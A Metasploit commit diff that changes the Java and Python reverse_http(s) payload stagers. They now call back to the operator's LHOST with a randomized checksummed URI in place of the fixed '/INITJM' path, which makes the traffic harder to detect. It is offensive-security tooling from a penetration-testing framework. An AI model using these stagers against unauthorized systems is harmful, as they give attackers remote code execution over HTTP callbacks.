Land rapid7#4951: Dynamic URI generation for Java/Python reverse_http(s)

Author: OJ

modules/payloads/stagers/java/reverse_http.rb

@@ -8,7 +8,7 @@
 
 module Metasploit3
 
-  CachedSize = 5500
+  CachedSize = 5499
 
   include Msf::Payload::Stager
   include Msf::Payload::Java
@@ -40,12 +40,22 @@ def initialize(info = {})
   end
 
   def config
+    # Default URL length is 30-256 bytes
+    uri_req_len = 30 + rand(256-30)
+
+    # Generate the short default URL if we don't know available space
+    if self.available_space.nil?
+      uri_req_len = 5
+    end
+
     spawn = datastore["Spawn"] || 2
     c =  ""
     c << "Spawn=#{spawn}\n"
     c << "URL=http://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    c << "/INITJM\n"
+    c << "/"
+    c << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITJ, uri_req_len)
+    c << "\n"
 
     c
   end

modules/payloads/stagers/java/reverse_https.rb

@@ -8,7 +8,7 @@
 
 module Metasploit3
 
-  CachedSize = 6308
+  CachedSize = 6307
 
   include Msf::Payload::Stager
   include Msf::Payload::Java
@@ -42,12 +42,22 @@ def initialize(info = {})
   end
 
   def config
+    # Default URL length is 30-256 bytes
+    uri_req_len = 30 + rand(256-30)
+
+    # Generate the short default URL if we don't know available space
+    if self.available_space.nil?
+      uri_req_len = 5
+    end
+
     spawn = datastore["Spawn"] || 2
     c =  ""
     c << "Spawn=#{spawn}\n"
     c << "URL=https://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    c << "/INITJM\n"
+    c << "/"
+    c << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITJ, uri_req_len)
+    c << "\n"
 
     c
   end

modules/payloads/stagers/python/reverse_http.rb

@@ -8,7 +8,7 @@
 
 module Metasploit3
 
-  CachedSize = 442
+  CachedSize = 446
 
   include Msf::Payload::Stager
 
@@ -50,7 +50,7 @@ def generate
     target_url << ':'
     target_url << datastore['LPORT'].to_s
     target_url << '/'
-    target_url << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP)
+    target_url << generate_callback_uri
 
     proxy_host = datastore['PayloadProxyHost'].to_s
     proxy_port = datastore['PayloadProxyPort'].to_i
@@ -77,4 +77,36 @@ def generate
     b64_stub << "')))"
     return b64_stub
   end
+
+  #
+  # Determine the maximum amount of space required for the features requested
+  #
+  def required_space
+    # Start with our cached default generated size
+    space = cached_size
+
+    # Add 100 bytes for the encoder to have some room
+    space += 100
+
+    # Make room for the maximum possible URL length
+    space += 256
+
+    # The final estimated size
+    space
+  end
+
+  #
+  # Return the longest URL that fits into our available space
+  #
+  def generate_callback_uri
+    uri_req_len = 30 + rand(256-30)
+
+    # Generate the short default URL if we don't have enough space
+    if self.available_space.nil? || required_space > self.available_space
+      uri_req_len = 5
+    end
+
+    generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP, uri_req_len)
+  end
+
 end